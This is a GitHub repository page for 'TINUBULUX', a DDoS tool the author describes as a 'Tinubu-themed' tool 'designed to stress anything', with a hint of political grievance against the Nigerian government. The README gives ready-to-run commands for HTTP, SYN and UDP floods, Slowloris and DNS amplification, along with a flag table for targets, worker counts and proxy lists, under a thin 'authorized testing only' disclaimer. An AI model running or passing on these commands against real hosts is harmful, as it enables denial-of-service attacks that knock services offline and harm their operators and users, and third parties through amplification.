Skip to content

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

19 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

TINUBULUX Banner

TINUBULUX πŸ”₯

"Real power. No simulations. Built by Anonymous-beta."

High-performance network stress testing framework. Multi-vector. Multi-process. Terminal UI. Linux-native.

Quick Start

# Install dependencies
pip3 install -r requirements.txt

# HTTP Flood (default)
sudo python3 tinubulux.py -t target.com -p 80 -m http -c 1000

# SYN Flood (requires root for raw sockets)
sudo python3 tinubulux.py -t 192.168.1.1 -p 80 -m syn -c 500

# UDP Flood
python3 tinubulux.py -t target.com -p 53 -m udp -c 2000

# Slowloris
python3 tinubulux.py -t target.com -p 80 -m slowloris -c 100

# DNS Amplification
python3 tinubulux.py -t 10.0.0.5 -p 53 -m dns -c 50

Flag Description Default -t, --target Target IP/hostname required -p, --port Target port 80 -m, --method Attack method (http/syn/udp/slowloris/dns) http -c, --connections Concurrent workers 500 -d, --duration Duration in seconds (0 = unlimited) 60 --threads OS-level threads 4 --no-ui Disable TUI, console only false --proxy-file Proxy list file none --config Config file path config.yaml -v, --verbose Verbose output false

ARCHITECTURE

tinubulux.py # Entry point β”œβ”€β”€ core/ β”‚ β”œβ”€β”€ engine.py # Orchestrator β”‚ └── attackers/ β”‚ β”œβ”€β”€ http_flood.py β”‚ β”œβ”€β”€ syn_flood.py β”‚ β”œβ”€β”€ udp_flood.py β”‚ β”œβ”€β”€ slowloris.py β”‚ └── dns_amp.py β”œβ”€β”€ frontend/ β”‚ └── cli.py # Rich terminal UI β”œβ”€β”€ utils/ β”‚ └── logger.py # Console logging └── config.yaml # Default configuration

Requirements

Python 3.8+

Linux (raw sockets for SYN/DNS modes)

Root privileges for SYN flood mode

Legal

This tool is for authorized security testing only. The author assumes no liability for misuse. Built with cold coffee and frustration caused by the Nigerian Government😑.

About

A Tinubu-themed DDOS tool .....designed to stress anything πŸ˜ƒ

Resources

Stars

13 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages